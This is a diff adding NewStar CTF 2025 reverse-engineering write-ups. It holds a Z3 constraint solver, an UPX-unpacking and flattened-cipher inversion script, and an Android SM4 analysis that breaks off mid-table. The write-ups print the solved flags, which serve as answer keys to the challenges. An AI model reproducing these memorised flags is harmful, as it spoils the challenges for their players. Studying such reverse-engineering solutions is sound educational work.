* flag[13] + 39 * flag[14] + 33 * flag[15] + 18 * flag[16] + 33 * flag[17] + 12 * flag[18] + 64 * flag[19] + 6 * flag[20] + 18 * flag[21] + 34 * flag[22] + 15 * flag[23] + 3 * flag[24] + 100 * flag[25] + 85 * flag[26] + 32 * flag[27] + 97 * flag[28] + 93 * flag[29] + 84 * flag[30] + 73 * flag[31] + 26 * flag[32] + 31 * flag[33] + 71 * flag[34] + 97 * flag[35] == 166497) +solver.add( 59 * flag[0] + 26 * flag[1] + 48 * flag[2] + 86 * flag[3] + 58 * flag[4] + 70 * flag[5] + 61 * flag[6] + 100 * flag[7] + 63 * flag[8] + 74 * flag[9] + 26 * flag[10] + 38 * flag[11] + 24* flag[12] + 45 * flag[13] + 52 * flag[14] + 32 * flag[15] + 91 * flag[16] + 89 * flag[17] + 19 * flag[18] + 59 * flag[19] + 87 * flag[20] + 5 * flag[21] + 15 * flag[22] + 68 * flag[23] + 72 *flag[24] + 67 * flag[25] + 2 * flag[26] + 65 * flag[27] + 46 * flag[28] + 10 * flag[29] + 33 * flag[30] + 79 * flag[31] + 11 * flag[32] + 16 * flag[33] + 73 * flag[34] + 53 * flag[35] == 173887) +solver.add( 6 * flag[0] + 66 * flag[1] + 59 * flag[2] + 76 * flag[3] + 86 * flag[4] + 20 * flag[5] + 59 * flag[6] + 34 * flag[7] + 28 * flag[8] + 48 * flag[9] + 86 * flag[10] + 5 * flag[11] + 87 * flag[12] + 13 * flag[13] + 95 * flag[14] + 87 * flag[15] + 65 * flag[16] + 35 * flag[17] + 58 * flag[18] + 10 * flag[19] + 98 * flag[20] + 100 * flag[21] + 4 * flag[22] + 78 * flag[23] + 66 * flag[24] + 57 * flag[25] + 34 * flag[26] + 86 * flag[27] + 62 * flag[28] + 36 * flag[29] + 92 * flag[30] + 28 * flag[31] + 3 * flag[32] + 24 * flag[33] + 49 * flag[34] + 28 * flag[35] == 173189) +solver.add( 25 * flag[0] + 48 * flag[1] + 44 * flag[2] + 16 * flag[3] + 99 * flag[4] + 100 * flag[5] + 69 * flag[6] + 26 * flag[7] + 65 * flag[8] + 32 * flag[9] + 18 * flag[10] + 65 * flag[11] + 58* flag[12] + 72 * flag[13] + 61 * flag[14] + 56 * flag[15] + 10 * flag[16] + 78 * flag[17] + 93 * flag[18] + 98 * flag[19] + 39 * flag[20] + 43 * flag[21] + 87 * flag[22] + 12 * flag[23] + 42 * flag[24] + 100 * flag[25] + 100 * flag[26] + 47 * flag[27] + 31 * flag[28] + 51 * flag[29] + 75 * flag[30] + 10 * flag[31] + 63 * flag[32] + 48 * flag[33] + 22 * flag[34] + 87 * flag[35] == 174138) +solver.add( 61 * flag[0] + 13 * flag[1] + 100 * flag[2] + 59 * flag[3] + 31 * flag[4] + 9 * flag[5] + 28 * flag[6] + 7 * flag[7] + 27 * flag[8] + 63 * flag[9] + 11 * flag[10] + 57 * flag[11] + 95 *flag[12] + 79 * flag[13] + 21 * flag[14] + 30 * flag[15] + 60 * flag[16] + 81 * flag[17] + 43 * flag[18] + 32 * flag[19] + 30 * flag[20] + 34 * flag[21] + 80 * flag[22] + 53 * flag[23] + 28 * flag[24] + 39 * flag[25] + 74 * flag[26] + 21 * flag[27] + 18 * flag[28] + 92 * flag[29] + 73 * flag[30] + 60 * flag[31] + 21 * flag[32] + 69 * flag[33] + 76 * flag[34] + 84 * flag[35] == 157623) +solver.add( 22 * flag[0] + 62 * flag[1] + 61 * flag[2] + 20 * flag[3] + 66 * flag[4] + 2 * flag[5] + 11 * flag[6] + 82 * flag[7] + 93 * flag[8] + 13 * flag[9] + 69 * flag[10] + 37 * flag[11] + 92 *flag[12] + 80 * flag[13] + 66 * flag[14] + 47 * flag[15] + 28 * flag[16] + 14 * flag[17] + 62 * flag[18] + 56 * flag[19] + 89 * flag[20] + 29 * flag[21] + 39 * flag[22] + 38 * flag[23] + 46 * flag[24] + 10 * flag[25] + 6 * flag[26] + 82 * flag[27] + 77 * flag[28] + 78 * flag[29] + 45 * flag[30] + 50 * flag[31] + 5 * flag[32] + 73 * flag[33] + 17 * flag[34] + 65 * flag[35] == 154943) +solver.add( 5 * flag[0] + 84 * flag[1] + 83 * flag[2] + 77 * flag[3] + 76 * flag[4] + 60 * flag[5] + 20 * flag[6] + 48 * flag[7] + 53 * flag[8] + 14 * flag[9] + 98 * flag[10] + 50 * flag[11] + 37 *flag[12] + 15 * flag[13] + 31 * flag[14] + 69 * flag[15] + 55 * flag[16] + 37 * flag[17] + 64 * flag[18] + 35 * flag[19] + 26 * flag[20] + 20 * flag[21] + 18 * flag[22] + 67 * flag[23] + 50 * flag[24] + 57 * flag[25] + 60 * flag[26] + 71 * flag[27] + 4 * flag[28] + 35 * flag[29] + 23 * flag[30] + 52 * flag[31] + 11 * flag[32] + 15 * flag[33] + 83 * flag[34] + 51 * flag[35] == 156078) +solver.add( 33 * flag[0] + 47 * flag[1] + 89 * flag[2] + 52 * flag[3] + 89 * flag[4] + 55 * flag[5] + 98 * flag[6] + 28 * flag[7] + 48 * flag[8] + 90 * flag[9] + 69 * flag[10] + 29 * flag[11] + 68 * flag[12] + 24 * flag[13] + 19 * flag[14] + 18 * flag[15] + 44 * flag[16] + 27 * flag[17] + 14 * flag[18] + 64 * flag[19] + 15 * flag[20] + 31 * flag[21] + 23 * flag[22] + 2 * flag[23] + 36 * flag[24] + 45 * flag[25] + 37 * flag[26] + 71 * flag[27] + 61 * flag[28] + 92 * flag[29] + 28 * flag[30] + 64 * flag[31] + 13 * flag[32] + 66 * flag[33] + 98 * flag[34] + 3 * flag[35] == 156158) +solver.add( 80 * flag[0] + 88 * flag[1] + 68 * flag[2] + 66 * flag[3] + 46 * flag[4] + 75 * flag[5] + 32 * flag[6] + 19 * flag[7] + 36 * flag[8] + 83 * flag[9] + 63 * flag[10] + 86 * flag[11] + 79 * flag[12] + 30 * flag[13] + 61 * flag[14] + 50 * flag[15] + 100 * flag[16] + 52 * flag[17] + 66 * flag[18] + 30 * flag[19] + 20 * flag[20] + 97 * flag[21] + 45 * flag[22] + 46 * flag[23] + 38 * flag[24] + 21 * flag[25] + 32 * flag[26] + 79 * flag[27] + 68 * flag[28] + 43 * flag[29] + 65 * flag[30] + 47 * flag[31] + 86 * flag[32] + 30 * flag[33] + 74 * flag[34] + 18 * flag[35] == 181770) +solver.add( 11 * flag[0] + 58 * flag[1] + 95 * flag[2] + 67 * flag[3] + 96 * flag[4] + 74 * flag[5] + 60 * flag[6] + 11 * flag[7] + 21 * flag[8] + 14 * flag[9] + 100 * flag[10] + 60 * flag[11] + 70* flag[12] + 92 * flag[13] + 92 * flag[14] + 39 * flag[15] + 43 * flag[16] + 52 * flag[17] + 5 * flag[18] + 22 * flag[19] + 90 * flag[20] + 70 * flag[21] + 12 * flag[22] + 52 * flag[23] + 36 *flag[24] + 21 * flag[25] + 45 * flag[26] + 59 * flag[27] + 74 * flag[28] + 46 * flag[29] + 11 * flag[30] + 60 * flag[31] + 8 * flag[32] + 52 * flag[33] + 14 * flag[34] + 77 * flag[35] == 173577) +solver.add( 57 * flag[0] + 37 * flag[1] + 94 * flag[2] + 43 * flag[3] + 53 * flag[4] + 55 * flag[5] + 7 * flag[6] + 83 * flag[7] + 91 * flag[8] + 61 * flag[9] + 86 * flag[10] + 6 * flag[11] + 44 * flag[12] + 87 * flag[13] + 61 * flag[14] + 92 * flag[15] + 24 * flag[16] + 74 * flag[17] + 100 * flag[18] + 22 * flag[19] + 12 * flag[20] + 68 * flag[21] + 19 * flag[22] + 88 * flag[23] + 81 * flag[24] + 83 * flag[25] + 70 * flag[26] + 39 * flag[27] + 30 * flag[28] + 82 * flag[29] + 30 * flag[30] + 35 * flag[31] + 55 * flag[32] + 18 * flag[33] + 27 * flag[34] + 80 * flag[35] == 180922) +solver.add( 80 * flag[0] + 14 * flag[1] + 5 * flag[2] + 89 * flag[3] + 71 * flag[4] + 82 * flag[5] + 44 * flag[6] + 8 * flag[7] + 33 * flag[8] + 26 * flag[9] + 77 * flag[10] + 49 * flag[11] + 36 * flag[12] + 90 * flag[13] + 73 * flag[14] + 71 * flag[15] + 66 * flag[16] + 4 * flag[17] + 37 * flag[18] + 78 * flag[19] + 38 * flag[20] + 18 * flag[21] + 15 * flag[22] + 79 * flag[23] + 6 * flag[24] + 74 * flag[25] + 18 * flag[26] + 85 * flag[27] + 56 * flag[28] + 53 * flag[29] + 90 * flag[30] + 75 * flag[31] + 52 * flag[32] + 2 * flag[33] + 13 * flag[34] + 54 * flag[35] == 158596) +solver.add( 96 * flag[0] + 29 * flag[1] + 37 * flag[2] + 70 * flag[3] + 92 * flag[4] + 80 * flag[5] + 24 * flag[6] + 36 * flag[7] + 32 * flag[8] + 29 * flag[9] + 78 * flag[10] + 45 * flag[11] + 58 * flag[12] + 55 * flag[13] + 16 * flag[14] + 92 * flag[15] + 71 * flag[16] + 82 * flag[17] + 86 * flag[18] + 23 * flag[19] + 4 * flag[20] + 58 * flag[21] + 16 * flag[22] + 18 * flag[23] + 38 * flag[24] + 53 * flag[25] + 82 * flag[26] + 76 * flag[27] + 83 * flag[28] + 73 * flag[29] + 87 * flag[30] + 36 * flag[31] + 61 * flag[32] + 85 * flag[33] + 61 * flag[34] + 69 * flag[35] == 181072) +solver.add( 14 * flag[0] + 71 * flag[1] + 53 * flag[2] + 46 * flag[3] + 59 * flag[4] + 53 * flag[5] + 22 * flag[6] + 69 * flag[7] + 67 * flag[8] + 43 * flag[9] + 23 * flag[10] + 14 * flag[11] + 77 * flag[12] + 95 * flag[13] + 19 * flag[14] + 83 * flag[15] + 79 * flag[16] + 41 * flag[17] + 12 * flag[18] + 53 * flag[19] + 3 * flag[20] + 4 * flag[21] + 65 * flag[22] + 92 * flag[23] + 64 * flag[24] + 52 * flag[25] + 3 * flag[26] + 59 * flag[27] + 89 * flag[28] + 75 * flag[29] + 12 * flag[30] + 46 * flag[31] + 61 * flag[32] + 53 * flag[33] + 97 * flag[34] + 43 * flag[35] == 163777) +solver.add( 57 * flag[0] + 99 * flag[1] + 49 * flag[2] + 100 * flag[3] + 68 * flag[4] + 99 * flag[5] + 26 * flag[6] + 65 * flag[7] + 47 * flag[8] + 65 * flag[9] + 90 * flag[10] + 68 * flag[11] + 84* flag[12] + 4 * flag[13] + 9 * flag[14] + 43 * flag[15] + 88 * flag[16] + 33 * flag[17] + 48 * flag[18] + 88 * flag[19] + 37 * flag[20] + 31 * flag[21] + 21 * flag[22] + 94 * flag[23] + 22 * flag[24] + 93 * flag[25] + 70 * flag[26] + 14 * flag[27] + 13 * flag[28] + 28 * flag[29] + 83 * flag[30] + 12 * flag[31] + 80 * flag[32] + 58 * flag[33] + 43 * flag[34] + 97 * flag[35] == 187620) +solver.add( 33 * flag[0] + 94 * flag[1] + 56 * flag[2] + 48 * flag[3] + 13 * flag[4] + 44 * flag[5] + 81 * flag[6] + 42 * flag[7] + 19 * flag[8] + 96 * flag[9] + 67 * flag[10] + 79 * flag[11] + 12 * flag[12] + 67 * flag[13] + 34 * flag[14] + 72 * flag[15] + 45 * flag[16] + 48 * flag[17] + 24 * flag[18] + 71 * flag[19] + 65 * flag[20] + 13 * flag[21] + 32 * flag[22] + 97 * flag[23] + 48 *flag[24] + 42 * flag[25] + 65 * flag[26] + 95 * flag[27] + 54 * flag[28] + 9 * flag[29] + 35 * flag[30] + 57 * flag[31] + 18 * flag[32] + 20 * flag[33] + 83 * flag[34] + 76 * flag[35] == 169266) +solver.add( 31 * flag[0] + 38 * flag[1] + 83 * flag[2] + 45 * flag[3] + 28 * flag[4] + 97 * flag[5] + 54 * flag[6] + 11 * flag[7] + 80 * flag[8] + 45 * flag[9] + 92 * flag[10] + 13 * flag[11] + 52 * flag[12] + 94 * flag[13] + 51 * flag[14] + 30 * flag[15] + 11 * flag[16] + 61 * flag[17] + 46 * flag[18] + 10 * flag[19] + 28 * flag[20] + 72 * flag[21] + 20 * flag[22] + 95 * flag[23] + 90 *flag[24] + 39 * flag[25] + 32 * flag[26] + 95 * flag[27] + 19 * flag[28] + 3 * flag[29] + 65 * flag[30] + 71 * flag[31] + 73 * flag[32] + 80 * flag[33] + 23 * flag[34] + 71 * flag[35] == 162587) +solver.add( 9 * flag[0] + 81 * flag[1] + 80 * flag[2] + 37 * flag[3] + 96 * flag[4] + 72 * flag[5] + 95 * flag[6] + 93 * flag[7] + 26 * flag[8] + 98 * flag[9] + 50 * flag[10] + 79 * flag[11] + 57 *flag[12] + 13 * flag[13] + 49 * flag[14] + 96 * flag[15] + 82 * flag[16] + 84 * flag[17] + 89 * flag[18] + 40 * flag[19] + 38 * flag[20] + 66 * flag[21] + 81 * flag[22] + 81 * flag[23] + 79 * flag[24] + 77 * flag[25] + 86 * flag[26] + 68 * flag[27] + 26 * flag[28] + 37 * flag[29] + 15 * flag[30] + 56 * flag[31] + 13 * flag[32] + 17 * flag[33] + 50 * flag[34] + 37 * flag[35] == 198705) +solver.add( 82 * flag[0] + 57 * flag[1] + 33 * flag[2] + 32 * flag[3] + 79 * flag[4] + 25 * flag[5] + 54 * flag[6] + 27 * flag[7] + 50 * flag[8] + 14 * flag[9] + 72 * flag[10] + 31 * flag[11] + 28 * flag[12] + 66 * flag[13] + 4 * flag[14] + 6 * flag[15] + 48 * flag[16] + 34 * flag[17] + 63 * flag[18] + 51 * flag[19] + 12 * flag[20] + 21 * flag[21] + 73 * flag[22] + 66 * flag[23] + 53 * flag[24] + 38 * flag[25] + 54 * flag[26] + 59 * flag[27] + 76 * flag[28] + 63 * flag[29] + 61 * flag[30] + 30 * flag[31] + 84 * flag[32] + 80 * flag[33] + 98 * flag[34] + 46 * flag[35] == 160349) +solver.add( 69 * flag[0] + 15 * flag[1] + 23 * flag[2] + 8 * flag[3] + 46 * flag[4] + 55 * flag[5] + 21 * flag[6] + 91 * flag[7] + 37 * flag[8] + 9 * flag[9] + 61 * flag[10] + 20 * flag[11] + 23 * flag[12] + 96 * flag[13] + 28 * flag[14] + 67 * flag[15] + 19 * flag[16] + 50 * flag[17] + 18 * flag[18] + 71 * flag[19] + 30 * flag[20] + 14 * flag[21] + 10 * flag[22] + 24 * flag[23] + 100 * flag[24] + 15 * flag[25] + 91 * flag[26] + 15 * flag[27] + 93 * flag[28] + 24 * flag[29] + 46 * flag[30] + 61 * flag[31] + 67 * flag[32] + 60 * flag[33] + 56 * flag[34] + 81 * flag[35] == 148095) + +if solver.check() == sat: + m = solver.model() + s = [] + for i in range(36): + s.append(m[flag[i]].as_long()) + print(bytes(s)) +else: + print('unsat') + +# flag{PytH0n_R3v3rs1Ng_4nd_Z3_s0lV3r} +``` diff --git a/docs/wp/2025/week3/reverse/upx-2.md b/docs/wp/2025/week3/reverse/upx-2.md new file mode 100644 index 0000000..088a2d5 --- /dev/null +++ b/docs/wp/2025/week3/reverse/upx-2.md @@ -0,0 +1,319 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 尤皮·埃克斯历险记(2) + +UPX 标识符改了,和正常的相比改了 UPX012!和版本号,改回去就行了,可以和 UPX1 cmp 一下 +改完脱壳查看主函数: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + _main(*(_QWORD *)&argc, argv, envp); + printf("Input your FLAG: "); + scanf("%48s", Str); + if ( strlen(Str) != 48 ) + { + puts("Wrong length!"); + exit_0(0); + } + Size = strlen(Str); + Block = malloc(Size); + memset(Block, 0, Size); + encrypt((unsigned __int8 *)Str, Size, Block); + for ( n47 = 0; n47 <= 47; ++n47 ) + { + if ( *((_BYTE *)Block + n47) != target[n47] ) + { + puts("Wrong FLAG!"); + exit_0(0); + } + } + puts("Right FLAG!"); + free(Block); + return 0; +} +``` + +FLAG 长度为 48,查看加密函数: + +```cpp +void __fastcall encrypt(unsigned __int8 *p_Str, size_t Size, _BYTE *a3) +{ + Count = (Size + 3) >> 2; + i_1 = (Count + 2) / 3; + Block = malloc(4 * Count); + v12 = calloc(Count, 4u); + for ( Count_1 = 0; Count_1 < Count; ++Count_1 ) + { + Block[Count_1] = 0; + if ( Size >= 4 * (Count_1 + 1) ) + n4 = 4; + else + n4 = Size - 4 * Count_1; + for ( n4_1 = 0; n4_1 < n4; ++n4_1 ) + Block[Count_1] |= p_Str[4 * Count_1 + n4_1] << (8 * n4_1); + } + for ( i = 0; i < i_1; ++i ) + { + memset(v8, 0, 0x12Cu); + for ( n2 = 0; n2 <= 2; ++n2 ) + { + Count_2 = 3 * i + n2; + if ( Count_2 >= Count ) + v8[n2] = 0; + else + v8[n2] = Block[Count_2]; + } + for ( n71 = 0; n71 <= 71; ++n71 ) + { + v3 = v8[n71]; + v4 = v3 ^ RoundFunc((unsigned int)(v8[n71 + 2] ^ v8[n71 + 1]) ^ keys[n71]); + v5 = n71 + 3; + v8[v5] = RoundFunc(v4); + } + for ( n2_1 = 0; n2_1 <= 2; ++n2_1 ) + { + Count_3 = 3 * i + n2_1; + if ( Count_3 < Count ) + v12[Count_3] = v8[n2_1 + 72]; + } + } + for ( i_2 = 0; i_2 < i_1; ++i_2 ) + { + for ( n2_2 = 0; n2_2 <= 2; ++n2_2 ) + { + Count_4 = 3 * i_2 + n2_2; + if ( Count_4 >= Count ) + break; + v6 = &v12[Count_4]; + if ( i_2 ) + v7 = *v6 ^ v12[Count_4 - 3]; + else + v7 = *v6 ^ IV[n2_2]; + *v6 = v7; + } + } + for ( Count_5 = 0; Count_5 < Count; ++Count_5 ) + { + *(_WORD *)&a3[4 * Count_5] = v12[Count_5]; + a3[4 * Count_5 + 2] = BYTE2(v12[Count_5]); + a3[4 * Count_5 + 3] = HIBYTE(v12[Count_5]); + } + free(Block); + free(v12); +} +``` + +是一个自定义加密,一次加密12字节,其中有多组key和3个iv,查看轮函数: + +```cpp +uint32_t RoundFunc(uint32_t a) { + unsigned int tag = 0x23fb19ad; + while(1){ + switch(tag){ + case 0x23fb19ad: + a -= 0xC0295960U; + tag /= 7; + break; + case 0x0523df18: + a ^= 0xFD714A3EU; + tag += 0x4157359f; + break; + case 0x467b14b7: + a -= 0x3744080FU; + tag |= 0x5f5244ff; + break; + case 0x5f7b54ff: + a += 0xE51E16E4U; + tag /= 9; + break; + case 0x0a9becff: + a -= 0x5707CB50U; + tag >>= 9; + break; + case 0x00054df6: + a -= 0xFD4A0953U; + tag &= 0xbbe92a36; + break; + case 0x00010836: + a -= 0x89FF5F44U; + tag -= 0x68b172a5; + break; + case 0x974f9591: + a -= 0x6215BBF4U; + tag ^= 0x5a17b182; + break; + case 0xcd582413: + a += 0x2D48CA6FU; + tag |= 0xcb4fc7ce; + break; + case 0xcf5fe7df: + a += 0xC3254D0AU; + tag *= 7; + break; + case 0xab9f5719: + a -= 0xBA272CADU; + tag |= 0x1755de91; + break; + case 0xbfdfdf99: + a -= 0x1D13CB21U; + tag /= 7; + break; + case 0x1b691ff1: + a -= 0xD53FCF4CU; + tag |= 0x37b972c0; + break; + case 0x3ff97ff1: + a -= 0x3D6D0903U; + tag += 0x4f721c31; + break; + case 0x8f6b9c22: + a ^= 0x1756F5FDU; + tag ^= 0x7ba43bea; + break; + case 0xf4cfa7c8: + a -= 0x706BD3C7U; + tag -= 0x4c6629b6; + break; + case 0xa8697e12: + a -= 0x3C2028B7U; + tag <<= 16; + break; + case 0x7e120000: + a -= 0xC5BE1781U; + tag -= 0xab5724e9; + break; + case 0xd2badb17: + a &= 0xFFFFFFFFU; + tag &= 0x93da8979; + break; + } + if(tag == 0x929a8911){ + break; + } + } + return a; +} +``` + +d810是去不掉这种混淆的,可以把函数复制出来,将含有a的行包裹上printf,这样打印出来的就是按顺序执行的加密: + +```cpp +a -= 0xC0295960; +a ^= 0xFD714A3E; +a -= 0x3744080F; +a += 0xE51E16E4; +a -= 0x5707CB50; +a -= 0xFD4A0953; +a -= 0x89FF5F44; +a -= 0x6215BBF4; +a += 0x2D48CA6F; +a += 0xC3254D0A; +a -= 0xBA272CAD; +a -= 0x1D13CB21; +a -= 0xD53FCF4C; +a -= 0x3D6D0903; +a ^= 0x1756F5FD; +a -= 0x706BD3C7; +a -= 0x3C2028B7; +a -= 0xC5BE1781; +``` + +编写脚本同构加密和解密即可: + +```py +def b2nle(b, n): + return [int.from_bytes(b[i:i+n], byteorder='little', signed=False) for i in range(0, len(b), n)] + +def n2ble(na, n): + b = bytearray() + for a in na: b.extend(a.to_bytes(n, byteorder='little')) + return b + +keys = [0xd344fc67, 0x2210bdb7, 0x76bb9c00, 0x53f1b5de, 0x821a977f, 0xf5b01673, 0x2a406627, 0x935f493c, 0xb98347c1, 0xe1ad274a, 0xf68b39ce, 0xbcb77109, + 0xae8207af, 0x54f52f5a, 0x2487acb7, 0x2baa52bd, 0xd7a45b9f, 0xb93d82c7, 0x77fbf041, 0x1747530c, 0x7ea63dee, 0x8bad0343, 0x38822bd3, 0x806b9e9d, + 0x242525cf, 0x1f5d96be, 0x1adb4554, 0x47b628d0, 0x77c9a358, 0x3c43d913, 0x711165d3, 0x1afdea6e, 0x57ef6f26, 0x75cdb37e, 0xf08680de, 0x7eaad562, + 0x7aba9243, 0x45af3320, 0xf7f816b2, 0x3dd5c8d1, 0x6d8251f6, 0x7606e5d0, 0x38dced31, 0x7fa1260b, 0xbaeff202, 0xd9d85e1d, 0x5e583700, 0x35dfcc5f, + 0x1b689abb, 0x1b2bbb67, 0xcf506375, 0x3a3d4268, 0x46a5141b, 0x7fe3136c, 0x3e86f672, 0x8a0b8eee, 0x33d87cd7, 0xd4a50ea9, 0xc77afcdd, 0xcdc0d74d, + 0xe0b6f0bc, 0x66c0e9c7, 0xd494b811, 0x9d1d8a81, 0x147c00b6, 0xdf60c3e4, 0x5fa112f8, 0x7186229a, 0x7fdcdc37, 0x1435fe6b, 0xf97112a5, 0xea79306c] + +IV = [0xbe87e8b2, 0x88e9f392, 0x16fb40c3] + +def RoundFunc(a): + a -= 0xC0295960 + a ^= 0xFD714A3E + a -= 0x3744080F + a += 0xE51E16E4 + a -= 0x5707CB50 + a -= 0xFD4A0953 + a -= 0x89FF5F44 + a -= 0x6215BBF4 + a += 0x2D48CA6F + a += 0xC3254D0A + a -= 0xBA272CAD + a -= 0x1D13CB21 + a -= 0xD53FCF4C + a -= 0x3D6D0903 + a ^= 0x1756F5FD + a -= 0x706BD3C7 + a -= 0x3C2028B7 + a -= 0xC5BE1781 + a &= 0xFFFFFFFF + return a + +def inv_RF(a): + a += 0xC5BE1781 + a += 0x3C2028B7 + a += 0x706BD3C7 + a ^= 0x1756F5FD + a += 0x3D6D0903 + a += 0xD53FCF4C + a += 0x1D13CB21 + a += 0xBA272CAD + a -= 0xC3254D0A + a -= 0x2D48CA6F + a += 0x6215BBF4 + a += 0x89FF5F44 + a += 0xFD4A0953 + a += 0x5707CB50 + a -= 0xE51E16E4 + a += 0x3744080F + a ^= 0xFD714A3E + a += 0xC0295960 + a &= 0xFFFFFFFF + return a + +binp = bytearray(b"") +dinp = b2nle(binp, 4) +dres = [0] * len(dinp) +for i in range(0, len(dinp), 3): + mes = dinp[i:i+3] + [0]*72 + for j in range(72): mes[j+3] = RoundFunc(mes[j] ^ RoundFunc(mes[j+1] ^ mes[j+2] ^ keys[j])) + dres[i:i+3] = mes[72:75] +for i in range(0, len(dinp) // 3): + if i == 0: + for j in range(3): dres[i*3+j] ^= IV[j] + else: + for j in range(3): dres[i*3+j] ^= dres[i*3+j-3] +bres = n2ble(dres, 4) +print(bres.hex()) + +bres = bytearray.fromhex("c7c94c956fbfc9f4c486a42057556be2eadcb73f9c421ee172820d93b3f9d0359370ff44726155f8ecdafb6ea8a6cb9e") +dres = b2nle(bres, 4) +dinp = [0] * len(dres) +for i in range(len(dres) // 3 - 1, -1, -1): + if i == 0: + for j in range(3): dres[i*3+j] ^= IV[j] + else: + for j in range(3): dres[i*3+j] ^= dres[i*3+j-3] +for i in range(len(dres)-3, -3, -3): + mes = [0]*72 + dres[i:i+3] + for j in range(71, -1, -1): mes[j] = inv_RF(mes[j+3]) ^ RoundFunc(mes[j+1] ^ mes[j+2] ^ keys[j]) + dinp[i:i+3] = mes[0:3] +binp = n2ble(dinp, 4) +print(binp.decode()) +``` + +`flag{CoN7r0l_F10w_F14t73n1nG_C4N_b3_c0NfU5iNg!!}` diff --git a/docs/wp/2025/week3/reverse/who-changed-key.md b/docs/wp/2025/week3/reverse/who-changed-key.md new file mode 100644 index 0000000..ef449a2 --- /dev/null +++ b/docs/wp/2025/week3/reverse/who-changed-key.md @@ -0,0 +1,279 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 谁改了我的密钥啊 + +## 分析 + +和 `Week2` 安卓一样,加密在 `so` 文件里 + +```cpp +__int64 __fastcall Java_work_pangbai_changemykey_FirstFragment_checkFlag(__int64 a1, __int64 a2, __int64 a3) +{ + const char *src; // x20 + int8x16_t v5; // [xsp+0h] [xbp-C0h] BYREF + unsigned int v6[4]; // [xsp+10h] [xbp-B0h] BYREF + __int128 v7; // [xsp+20h] [xbp-A0h] + __int128 v8; // [xsp+30h] [xbp-90h] + __int128 v9; // [xsp+40h] [xbp-80h] + __int128 v10; // [xsp+50h] [xbp-70h] + __int128 v11; // [xsp+60h] [xbp-60h] + __int128 v12; // [xsp+70h] [xbp-50h] + __int128 v13; // [xsp+80h] [xbp-40h] + char dest[16]; // [xsp+90h] [xbp-30h] BYREF + __int128 v15; // [xsp+A0h] [xbp-20h] + __int64 v16; // [xsp+B8h] [xbp-8h] + + v16 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40); + src = (const char *)(*(__int64 (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)a1 + 1352LL))(a1, a3, 0LL); + __android_log_print(4, "native", "input:%s", src); + *(_OWORD *)dest = 0u; + v15 = 0u; + strncpy(dest, src, 0x10uLL); + v12 = 0u; + v13 = 0u; + v10 = 0u; + v11 = 0u; + v8 = 0u; + v9 = 0u; + *(_OWORD *)v6 = 0u; + v7 = 0u; + __android_log_print(4, "native", aKey, (unsigned __int8)MK); + __android_log_print(4, "native", aKey, BYTE1(MK)); + __android_log_print(4, "native", aKey, BYTE2(MK)); + __android_log_print(4, "native", aKey, BYTE3(MK)); + __android_log_print(4, "native", aKey, BYTE4(MK)); + __android_log_print(4, "native", aKey, BYTE5(MK)); + __android_log_print(4, "native", aKey, BYTE6(MK)); + __android_log_print(4, "native", aKey, BYTE7(MK)); + __android_log_print(4, "native", aKey, BYTE8(MK)); + __android_log_print(4, "native", aKey, BYTE9(MK)); + __android_log_print(4, "native", aKey, BYTE10(MK)); + __android_log_print(4, "native", aKey, BYTE11(MK)); + __android_log_print(4, "native", aKey, BYTE12(MK)); + __android_log_print(4, "native", aKey, BYTE13(MK)); + __android_log_print(4, "native", aKey, BYTE14(MK)); + __android_log_print(4, "native", aKey, HIBYTE(MK)); + v5 = veorq_s8((int8x16_t)MK, (int8x16_t)xmmword_900); + extendSecond(v6, (unsigned int *)&v5); + iterate32((unsigned int *)dest, v6); + if ( *(_DWORD *)&dest[12] == mm ) + return (*(_DWORD *)&dest[8] == dword_398C && *(_DWORD *)&dest[4] == unk_3990) & (unsigned __int8)(*(_DWORD *)dest == dword_3994); + else + return 0LL; +} +``` + +由于 `apk` 是 `release` 编译的,所以代码有很多优化,可能有点看不出原样。看到函数列表的 `encryptSM4` 应该也能猜到这题是考查国密 `SM4`。`MK` 其实就是密钥 `{1, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0, 0, 5, 0, 0, 0}`,`mm` 和之后的那几个值是密文。 + +```cpp +.data:0000000000003988 B3 E9 0D B6 mm DCD 0xB60DE9B3 ; DATA XREF: LOAD:0000000000000508↑o +.data:0000000000003988 ; Java_work_pangbai_changemykey_FirstFragment_checkFlag+20C↑r ... +.data:000000000000398C 4C 7B 7A 7A dword_398C DCD 0x7A7A7B4C ; DATA XREF: Java_work_pangbai_changemykey_FirstFragment_checkFlag+218↑r +.data:0000000000003990 89 37 D0 C7 dword_3990 DCD 0xC7D03789 ; DATA XREF: Java_work_pangbai_changemykey_FirstFragment_checkFlag+218↑r +.data:0000000000003994 6C 8E 27 2A dword_3994 DCD 0x2A278E6C ; DATA XREF: Java_work_pangbai_changemykey_FirstFragment_checkFlag+224↑r +.data:0000000000003994 ; .data ends +``` + +没有其他的修改,但是网上的 `SM4` 解密网站其实是解不出来的,原因出在端序转化上,注意明文和密钥传入再到加密的数据在内存中是怎么样的。 + +```cpp +#include +#include +#include + +#define SAR(x, n) (((x >> (32 - n))) | (x << n)) + +#define L1(BB) BB ^ SAR(BB, 2) ^ SAR(BB, 10) ^ SAR(BB, 18) ^ SAR(BB, 24) + +#define L2(BB) BB ^ SAR(BB, 13) ^ SAR(BB, 23) + +/*系统参数*/ +unsigned int FK[4] = {0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc}; + +/*固定参数*/ +unsigned int CK[32] = + { + 0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269, + 0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9, + 0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249, + 0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9, + 0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229, + 0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299, + 0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209, + 0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279}; + +/*τ变换 S 盒*/ +unsigned char TAO[16][16] = + { + {0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 